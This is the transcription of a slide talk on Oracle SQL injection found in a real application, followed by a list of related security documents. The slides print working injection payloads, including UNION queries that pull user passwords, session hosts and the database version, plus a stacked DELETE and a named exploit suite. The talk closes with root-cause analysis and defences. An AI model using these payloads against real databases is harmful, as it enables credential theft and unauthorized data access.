Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl
|
|
- Georgiana Stone
- 6 years ago
- Views:
Transcription
1 Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl 1
2 2
3 What Is SQL Injection? Incorrectly validated or nonvalidated string literals are concatenated into a dynamic SQL statement, and interpreted as code by the SQL engine. 3
4 Why SQL Injection? Get access to a different user account Find data you are not allowed to see Become a DBA without job promotion Infiltrate other backend servers assuming you are a really bad guy 4
5 Categories of Attacks SQL Manipulation Code Injection Function Call Injection Buffer Overflows 5
6 SQL Manipulation SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' or 'a' = 'a' The WHERE clause is true for every row 6
7 SQL Manipulation SELECT product_name FROM all_products WHERE product_name like '%Chairs%' SELECT product_name FROM all_products WHERE product_name like '%Chairs' UNION SELECT username FROM dba_users WHERE username like '%' SQL statement is returning rows from another table 7
8 Code Injection SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; DELETE FROM users WHERE username = 'admin'; Does not work with Oracle (easily)... 8
9 Function Call Injection SELECT TRANSLATE('user input', ' ABCDEFGHIJKLMNOPQRSTUVWXYZ', ' ') FROM dual; SELECT TRANSLATE('' UTL_HTTP.REQUEST(' /') '', ' ABCDEFGHIJKLMNOPQRSTUVWXYZ', ' ') FROM dual; UTL_HTTP.REQUEST uses a URL as its argument and returns up to the first 2000 bytes of data retrieved from that URL 9
10 Are You Afraid of SQL Injection?! 10
11 You Better Should 11
12 First Contact 12
13 First Contact '; -- 13
14 14
15 Hello World ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' 15
16 Hello World ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' 16
17 Password Helper ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' 17
18 Password Helper ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' 18
19 Password Helper select table_x_site_search.x_site_objid, x_bo_status,x_bo_x_sales_segment, x_bo_org_id,x_b_x_ban_id, x_company_name,x_a_address,x_a_zipcode,x_a_city, x_ctry_name,x_ctry_x_iso_code_2l, x_b_x_firmenbuchnummer,x_b_x_uid_number, x_e_first_name,x_e_last_name, x_e_e_mail,x_user_login_name from table_x_site_search, table_bus_org where table_x_site_search.x_bo_org_id = table_bus_org.org_id and x_s_company_name like 'MO%' and x_ctry_x_iso_code_2l = 'AT' and upper(x_a_s_address) like 'ER%' and x_a_zipcode = '' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('MKPE9R') OR 1='' and rownum <=
20 DB Host Lookup ' UNION SELECT 1,0,'','','',S.MACHINE,'','','','','','','','','','','' FROM V$SESSION S, V$PROCESS P WHERE P.SPID = S.PROCESS AND MACHINE IS NOT NULL OR 1=' 20
21 Get Oracle Version ' UNION SELECT 1,0,'','','',VERSION,'','','','','','','','','','','' FROM DBA_REGISTRY WHERE COMP_ID = 'CATALOG' OR 1=' 21
22 Oracle Cheat Sheet List users and password hashes checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10. List all databases, tables and columns Local file access using UTL_FILE Make DNS requests 22
23 Cool Oracle Exploits raptor_oraextproc.sql raptor_oraexec.sql raptor_orafile.sql Directory traversal vulnerability in extproc Exploitation suite for Oracle written in Java, to read/write files and execute OS commands File system access suite for Oracle based on the utl_file package, to read/ write files 23
24 Root Cause Analysis Affects CUSI I29 and I30-dev RegExp validation for PLZ is broken Input field is not truncated No SQL escaping of query parameter Literal SQL Statement is used Passwords are not always encrypted 24
25 How To Avoid Prepared Statements Test for SQL Vulnerability Code Reviews Think about security Before someone else is doing it for you 25
26 Why this would not happen to you?! 26
27 Question And Answers 27
28 Resources
SQL Injection Attacks and Defense
SQL Injection Attacks and Defense Justin Clarke Lead Author and Technical Editor Rodrigo Marcos Alvarez Dave Hartley Joseph Hemler Alexander Kornbrust Haroon Meer Gary O'Leary-Steele Alberto Revelli Marco
More informationAdvanced SQL Injection Techniques. Roy Fox Red Team Manager, Sentrigo
Advanced SQL Injection Techniques Roy Fox Red Team Manager, Sentrigo About me Head of Security Research (Red Team) at Sentrigo Background: technical information security for gov t At Sentrigo we write
More informationHolistic Database Security
Holistic Database Security 1 Important Terms Exploit: Take advantage of a flaw or feature Attack Surface: Any node on the network that can be attacked. That can be the UI, People, anything that touches
More informationDatabase Attacks, How to protect the corporate assets. Presented by: James Bleecker
Database Attacks, How to protect the corporate assets Presented by: James Bleecker Agenda Introduction Network/Application Landscape Database Vulnerabilities Are The New Front-Lines Attacking Where the
More informationAutomated SQL Ownage Techniques. OWASP October 30 th, The OWASP Foundation
Automated SQL Ownage Techniques October 30 th, 2009 Sebastian Cufre Developer Core Security Technologies sebastian.cufre@coresecurity.com Copyright The Foundation Permission is granted to copy, distribute
More informationLecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion
IN5290 Ethical Hacking Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion Universitetet i Oslo Laszlo Erdödi Lecture Overview What is SQL injection
More informationIT Service Delivery and Support Week Three. IT Auditing and Cyber Security Fall 2016 Instructor: Liang Yao
IT Service Delivery and Support Week Three IT Auditing and Cyber Security Fall 2016 Instructor: Liang Yao 1 Infrastructure Essentials Computer Hardware Operating Systems (OS) & System Software Applications
More informationWeb Application & Web Server Vulnerabilities Assessment Pankaj Sharma
Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?
More informationCSE 127 Computer Security
CSE 127 Computer Security Fall 2015 Web Security I: SQL injection Stefan Savage The Web creates new problems Web sites are programs Partially implemented in browser» Javascript, Java, Flash Partially implemented
More informationSecure Programming and! Common Errors! PART II"
Secure Programming and! Common Errors! PART II" brought to you by Michele AntiSnatchOr Orrù and Integrating Web LTD! Computer System Security course lead by Prof. Ozalp Babaoglu! 9 December 2009! Who am
More informationMWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010
MWR InfoSecurity Security Advisory Oracle Enterprise Manager SQL Injection Advisory 1 st February 2010 2010-11-12 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description... 4 1.1 Introduction...
More informationATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC
ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC AGENDA VULNERABILITIES OF WEB EXPLOIT METHODS COUNTERMEASURE About Me DIRECTOR OF FORESEC COUNTER TERRORIST ACTION TEAM RESEARCH
More informationI n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:
This time Continuing with Software Security Getting insane with I n p u t sanitization ); drop table slides New attacks and countermeasures: SQL injection Background on web architectures A very basic web
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationCIS 700/002 : Special Topics : OWASP ZED (ZAP)
CIS 700/002 : Special Topics : OWASP ZED (ZAP) Hitali Sheth CIS 700/002: Security of EMBS/CPS/IoT Department of Computer and Information Science School of Engineering and Applied Science University of
More informationWeb Security. Attacks on Servers 11/6/2017 1
Web Security Attacks on Servers 11/6/2017 1 Server side Scripting Javascript code is executed on the client side on a user s web browser Server side code is executed on the server side. The server side
More informationSecure Web App. 제목 : Secure Web Application v1.0 ( 채수민책임 ) Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 -
Secure Web App. Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 - Building & Testing Secure Web Applications By Aspect Security Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 2
More informationSQL Injection. EECS Introduction to Database Management Systems
SQL Injection EECS3421 - Introduction to Database Management Systems Credit "Foundations of Security: What Every Programmer Needs To Know" (Chapter 8) by Neil Daswani, Christoph Kern, and Anita Kesavan
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationOracle Database 10g: Introduction to SQL
ORACLE UNIVERSITY CONTACT US: 00 9714 390 9000 Oracle Database 10g: Introduction to SQL Duration: 5 Days What you will learn This course offers students an introduction to Oracle Database 10g database
More informationTutorial on SQL Injection
Tutorial on SQL Injection Author: Nagasahas Dasa Information Security Enthusiast You can reach me on solidmonster.com or nagasahas@gmail.com Big time!!! Been long time since I posted my blog, this would
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationGet Oracle Schema Ddl Syntax With Dbms_metadata
Get Oracle Schema Ddl Syntax With Dbms_metadata It there an easy way to extract DDLs from an Oracle 10 schema (tables and route, then rather than trying to convert Oracle DDL syntax to H2 you'd be better
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationThe Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else
The Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else Paula Januszkiewicz CQURE: CEO, Penetration Tester CQURE Offices: New York, Dubai, Warsaw MVP: Enterprise Security,
More informationWeb Penetration Testing
Web Penetration Testing What is a Website How to hack a Website? Computer with OS and some servers. Apache, MySQL...etc Contains web application. PHP, Python...etc Web application is executed here and
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationSimon Pane First4 Database Partners March 15, 2012
Simon Pane First4 Database Partners Simon.Pane@first4db.com March 15, 2012 Review some of the lesser used security features of the Oracle database Discuss both advantages and disadvantages (or limitations)
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Slide credit: John Mitchell Dawn Song Security User Interface Dawn Song Safe to type your password? SAFEBANK Bank of the Safe
More informationInjection. CSC 482/582: Computer Security Slide #1
Injection Slide #1 Topics 1. Injection Attacks 2. SQL Injection 3. Mitigating SQL Injection 4. XML Injection Slide #2 Injection Injection attacks trick an application into including unintended commands
More informationSBCC Web File System - Xythos
Table of Contents Table of Contents...1 Purpose...1 Login Procedure...1 Creating and Sharing a Web Folder for MAT153...2 Dreamweaver Remote Info...4 I Forgot My Pipeline Credentials...6 Purpose This purpose
More informationIntegrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,
More informationSecure Programming Techniques
Secure Programming Techniques Meelis ROOS mroos@ut.ee Institute of Computer Science Tartu University spring 2014 Course outline Introduction General principles Code auditing C/C++ Web SQL Injection PHP
More informationCS 377 Database Systems. Li Xiong Department of Mathematics and Computer Science Emory University
CS 377 Database Systems Database Programming in PHP Li Xiong Department of Mathematics and Computer Science Emory University Outline A Simple PHP Example Overview of Basic Features of PHP Overview of PHP
More informationPenetration from application down to OS
April 8, 2009 Penetration from application down to OS Getting OS access using Oracle Database unprivileged user Digitаl Security Research Group (DSecRG) Alexandr Polyakov research@dsecrg.com www.dsecrg.com
More informationKarthik Bharathy Program Manager, SQL Server Microsoft
Karthik Bharathy Program Manager, SQL Server Microsoft Key Session takeaways Understand the many views of SQL Server Look at hardening SQL Server At the network level At the access level At the data level
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 15: Software Security II Department of Computer Science and Engineering University at Buffalo 1 Software Vulnerabilities Buffer overflow vulnerabilities account
More informationUniform Resource Locators (URL)
The World Wide Web Web Web site consists of simply of pages of text and images A web pages are render by a web browser Retrieving a webpage online: Client open a web browser on the local machine The web
More informationInterpreting Explain Plan Output. John Mullins
Interpreting Explain Plan Output John Mullins jmullins@themisinc.com www.themisinc.com www.themisinc.com/webinars Presenter John Mullins Themis Inc. (jmullins@themisinc.com) 30+ years of Oracle experience
More informationWEB SECURITY: SQL INJECTION
WEB SECURITY: SQL INJECTION CMSC 414 FEB 15 2018 A very basic web architecture Client Server A very basic web architecture Client Server A very basic web architecture Client Server A very basic web architecture
More informationDatabase Rootkits. Alexander Kornbrust 01-April Red-Database-Security GmbH. Alexander Kornbrust, 01-Apr-2005 V1.05 1
Database Rootkits Alexander Kornbrust 01-April-2005 Alexander Kornbrust, 01-Apr-2005 V1.05 1 Agenda 1. Introduction 2. OS Rootkits 3. Database Rootkits 4. Execution Path 5. Hide Users 6. Hide Processes
More informationWeb Security. Outline
Security CS 161/194-1 Anthony D. Joseph November 21, 2005 s Outline Static and Dynamic Content Firewall review Adding a DMZ Secure Topologies 2 1 Polls How many people have set up a personal web server?
More informationFeaturing. and. Göteborg. Ulf Larson Thursday, October 24, 13
Featuring and Göteborg OWASP top ten 2013 Based on risk data from eight firms that specialize in application security, This data spans over 500,000 vulnerabilities across hundreds of organizations and
More informationA1 (Part 2): Injection SQL Injection
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Firewall Firewall Accounts
More informationPASSWORDS TREES AND HIERARCHIES. CS121: Relational Databases Fall 2017 Lecture 24
PASSWORDS TREES AND HIERARCHIES CS121: Relational Databases Fall 2017 Lecture 24 Account Password Management 2 Mentioned a retailer with an online website Need a database to store user account details
More informationSQL (Structured Query Language)
Dear Student, Based upon your enquiry we are pleased to send you the course curriculum for Oracle DBA 11g SQL (Structured Query Language) Software Installation (Environment Setup for Oracle on Window10)
More informationEDUVITZ TECHNOLOGIES
EDUVITZ TECHNOLOGIES Oracle Course Overview Oracle Training Course Prerequisites Computer Fundamentals, Windows Operating System Basic knowledge of database can be much more useful Oracle Training Course
More informationOracle post exploitation techniques. László Tóth
Oracle post exploitation techniques László Tóth donctl@gmail.com Disclaimer The views expressed in this presentation are my own and not necessarily the views of my current, past or future employers. Content
More informationServer-side web security (part 2 - attacks and defences)
Server-side web security (part 2 - attacks and defences) Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Basic injections $query = "SELECT name, lastname,
More informationRunning SQL in Java and PHP
Running SQL in Java and PHP FCDB 9.6 9.7 Dr. Chris Mayfield Department of Computer Science James Madison University Mar 01, 2017 Introduction to JDBC JDBC = Java Database Connectivity 1. Connect to the
More informationBlind Sql Injection with Regular Expressions Attack
Blind Sql Injection with Regular Expressions Attack Authors: Simone Quatrini Marco Rondini 1/9 Index Why blind sql injection?...3 How blind sql injection can be used?...3 Testing vulnerability (MySQL -
More informationAnnouncements. PS 3 is out (see the usual place on the course web) Be sure to read my notes carefully Also read. Take a break around 10:15am
Announcements PS 3 is out (see the usual place on the course web) Be sure to read my notes carefully Also read SQL tutorial: http://www.w3schools.com/sql/default.asp Take a break around 10:15am 1 Databases
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationWelcome to the OWASP TOP 10
Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA
More informationweb.py Tutorial Tom Kelliher, CS 317 This tutorial is the tutorial from the web.py web site, with a few revisions for our local environment.
web.py Tutorial Tom Kelliher, CS 317 1 Acknowledgment This tutorial is the tutorial from the web.py web site, with a few revisions for our local environment. 2 Starting So you know Python and want to make
More informationAssignment 6. This lab should be performed under the Oracle Linux VM provided in the course.
Assignment 6 This assignment includes hands-on exercises in the Oracle VM. It has two Parts. Part 1 is SQL Injection Lab and Part 2 is Encryption Lab. Deliverables You will be submitting evidence that
More informationSichere Software vom Java-Entwickler
Sichere Software vom Java-Entwickler Dominik Schadow Java Forum Stuttgart 05.07.2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN We can no longer
More information1. Oracle mod_plsql v in Oracle9i Application Server v1.0.2.x (Oracle9iAS v1.0.2.x)
Oracle Security Alert #28 Dated: 06 Feburary 2002 Updated: 05 July 2002 1. Oracle mod_plsql v3.0.9.8.2 in Oracle9i Application Server (Oracle9iAS ) a) Potential buffer overflow-related security vulnerabilities
More informationCSE 127: Computer Security SQL Injection. Vector Li
CSE 127: Computer Security SQL Injection Vector Li November 14, 2017 A Magic Trick The functional specification only allowed seeing one user s posts at a time Current user s posts on view.php without
More informationDaniel Pittman October 17, 2011
Daniel Pittman October 17, 2011 SELECT target-list FROM relation-list WHERE qualification target-list A list of attributes of relations in relation-list relation-list A list of relation names qualification
More informationOfer MAOR CTO Quotium
Ofer MAOR CTO Quotium @OferMaor Application Performance Monitoring OWASP Israel Sep 2014 Introduction Incidents The Problem Runtime Analysis / IAST DataHound - Free Tool Q&A About Myself 20 years in information/application
More informationeb Security Software Studio
eb Security Software Studio yslin@datalab 1 OWASP Top 10 Security Risks in 2017 Rank Name 1 Injection 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control
More informationMobile Trends And The New Threats Is Your SAP System Vulnerable to Cyber Attacks? Stephen Lamy, Virtual Forge
Mobile Trends And The New Threats Is Your SAP System Vulnerable to Cyber Attacks? Stephen Lamy, Virtual Forge Agenda Mobile Trends and The New Threats The Forgotten Layer Benchmarks of Defects in Custom
More informationTop 10 Database Security Threats and How to Stop Them. Rob Rachwald Director of Security Strategy
Top 10 Database Security Threats and How to Stop Them Rob Rachwald Director of Security Strategy Data Has Value Data Has Value Top 7 Attacks Discussed in Hacker Forums 11% 9% 12% 12% 15% 21% 20% dos/ddos
More informationRunning SQL in Java and PHP
Running SQL in Java and PHP FCDB 9.6 9.7 Dr. Chris Mayfield Department of Computer Science James Madison University Feb 28, 2018 Introduction to JDBC JDBC = Java Database Connectivity 1. Connect to the
More informationHack-Proofing Your ASP.NET Applications
Note: Article is mapped toe ACCP Trim 4 and ACCP-Pro Term III Introduction Almost every day, the mainstream media reports that another site has been hacked. These constant intrusions by prominent hacker
More informationPenetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may
More informationExam4Free. Free valid exam questions and answers for certification exam prep
Exam4Free http://www.exam4free.com Free valid exam questions and answers for certification exam prep Exam : MA0-150 Title : McAfee Certified Assessment Specialist- UH Vendors : McAfee Version : DEMO Get
More informationSQL Injec*on. By Robin Gonzalez
SQL Injec*on By Robin Gonzalez Some things that can go wrong Excessive and Unused Privileges Privilege Abuse Input Injec>on Malware Week Audit Trail Other things that can go wrong Storage Media Exposure
More informationOracle Database 11g: SQL Tuning Workshop
Oracle University Contact Us: Local: 0845 777 7 711 Intl: +44 845 777 7 711 Oracle Database 11g: SQL Tuning Workshop Duration: 3 Days What you will learn This Oracle Database 11g: SQL Tuning Workshop Release
More informationComputer Security. 04r. Pre-exam 1 Concept Review. Paul Krzyzanowski. Rutgers University. Spring 2018
Computer Security 04r. Pre-exam 1 Concept Review Paul Krzyzanowski Rutgers University Spring 2018 February 15, 2018 CS 419 2018 Paul Krzyzanowski 1 Key ideas from the past four lectures February 15, 2018
More informationCSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the server-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Threat model In these scenarios: The server is benign The client is malicious The client
More informationSecure Programming. Input Validation. Learning objectives Code Injection: Outline. 4 Code Injection
Secure Programming Input Validation 2 Learning objectives Understand the definition of code injection Know how code injection happens Learn how to perform input validation and cleansing 1 Ahmet Burak Can
More informationModule 9: Managing Schema Objects
Module 9: Managing Schema Objects Overview Naming guidelines for identifiers in schema object definitions Storage and structure of schema objects Implementing data integrity using constraints Implementing
More informationMASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz II
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.893 Fall 2009 Quiz II All problems are open-ended questions. In order to receive credit you must answer
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationLoad data into Table from external files, using two methods:
Load data into Table from external files, using two methods: 1) SQL Loader 2) External tables I) SQL Loader. Source Table Name : SYS.DBA_USERS Target Table Name : SYS.MY_DBA_USERS 1) We need to have the
More informationOracle Security Masterclass
UKOUG Conference 2008, December 5 th 2008 Oracle Security Masterclass By Pete Finnigan Updated Wednesday, 26th November 2008 1 Why Am I Qualified To Speak Founded February 2003 CEO Pete Finnigan Clients
More informationSql Server Syllabus. Overview
Sql Server Syllabus Overview This SQL Server training teaches developers all the Transact-SQL skills they need to create database objects like Tables, Views, Stored procedures & Functions and triggers
More informationExcerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt
Excerpts of Web Application Security focusing on Data Validation adapted for F.I.S.T. 2004, Frankfurt by fs Purpose of this course: 1. Relate to WA s and get a basic understanding of them 2. Understand
More informationThis slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in
1 This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in terms of prevalence (how much the vulnerability is widespread),
More informationProgram Security and Vulnerabilities Class 2
Program Security and Vulnerabilities Class 2 CEN-5079: 28.August.2017 1 Secure Programs Programs Operating System Device Drivers Network Software (TCP stack, web servers ) Database Management Systems Integrity
More informationConfiguring the Oracle Network Environment. Copyright 2009, Oracle. All rights reserved.
Configuring the Oracle Network Environment Objectives After completing this lesson, you should be able to: Use Enterprise Manager to: Create additional listeners Create Oracle Net Service aliases Configure
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationOracle Security Masterclass
Why Am I Qualified To Speak OUGF Conference 2009, May 14 th 2009 Oracle Security Masterclass By Pete Finnigan Updated Wednesday, 12th May 2009 Founded February 2003 CEO Pete Finnigan Clients UK, States,
More informationLecture 13: MySQL and PHP. Monday, March 26, 2018
Lecture 13: MySQL and PHP Monday, March 26, 2018 MySQL The Old Way In older versions of PHP, we typically used functions that started with mysql_ that did not belong to a class For example: o o o o mysql_connect()
More informationUnderstanding Advanced Blind SQLI attack
Understanding Advanced Blind SQLI attack Amit Dabas, Ashish Kumar Sharma Cyber Forensics & Information Security, MDU,amitdab@gmail.com,+918588831807 Abstract SQL Injection is not new attack to our web
More informationPersistent key, value storage
Persistent key, value storage In programs, often use hash tables - E.g., Buckets are an array of pointers, collision chaining For persistant data, minimize # disk accesses - Traversing linked lists is
More informationWeb Security. Web Programming.
Web Security Web Programming yslin@datalab 1 OWASP Top 10 Security Risks in 2017 Rank Name 1 Injection 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control
More informationINF 102 CONCEPTS OF PROG. LANGS ADVERSITY. Instructors: James Jones Copyright Instructors.
INF 102 CONCEPTS OF PROG. LANGS ADVERSITY Instructors: James Jones Copyright Instructors. Approaches to failure Let it fail Good in development: understand failure mode Defend against the possible and
More informationOracle PL/SQL Gateway 0-Day
Oracle PL/SQL Gateway 0-Day David Litchfield Critical Alert Briefing 7 th of November 2005 NGSResearch issue a Critical Alert Briefing to NISCC Government systems are known to exposed An attack can be
More informationLecture 4 September Required reading materials for this class
EECS 261: Computer Security Fall 2007 Lecture 4 September 6 Lecturer: David Wagner Scribe: DK Moon 4.1 Required reading materials for this class Beyond Stack Smashing: Recent Advances in Exploiting Buffer
More informationCSCE 548 Building Secure Software SQL Injection Attack
CSCE 548 Building Secure Software SQL Injection Attack Professor Lisa Luo Spring 2018 Previous class DirtyCOW is a special type of race condition problem It is related to memory mapping We learned how
More informationExam Questions MA0-150
Exam Questions MA0-150 McAfee Certified Assessment Specialist- UH https://www.2passeasy.com/dumps/ma0-150/ 1.An attacker has compromised a Linux/Unix host and discovers a suspicious file called "password"
More informationSecurity context. Technology. Solution highlights
Code42 CrashPlan Security Code42 CrashPlan provides continuous, automatic desktop and laptop backup. Our layered approach to security exceeds industry best practices and fulfills the enterprise need for
More informationCS 161 Computer Security
Nick Weaver Fall 2018 CS 161 Computer Security Homework 3 Due: Friday, 19 October 2018, at 11:59pm Instructions. This homework is due Friday, 19 October 2018, at 11:59pm. No late homeworks will be accepted
More informationWordPress Security Plugins vs. WAF Services. A Comparative Test of WAF Accuracy in Security Solutions
WordPress Security Plugins vs. WAF Services A Comparative Test of WAF Accuracy in Security Solutions Contents Abstract... 3 Introduction... 3 WAF Evaluation Criteria... 4 Results... 5 Pattern Analysis...
More informationApplication Layer Security
Application Layer Security General overview Ma. Angel Marquez Andrade Benefits of web Applications: No need to distribute separate client software Changes to the interface take effect immediately Client-side
More informationTable of Contents. PDF created with FinePrint pdffactory Pro trial version
Table of Contents Course Description The SQL Course covers relational database principles and Oracle concepts, writing basic SQL statements, restricting and sorting data, and using single-row functions.
More informationSecuring Internet Communication: TLS
Securing Internet Communication: TLS CS 161: Computer Security Prof. David Wagner March 11, 2016 Today s Lecture Applying crypto technology in practice Two simple abstractions cover 80% of the use cases
More information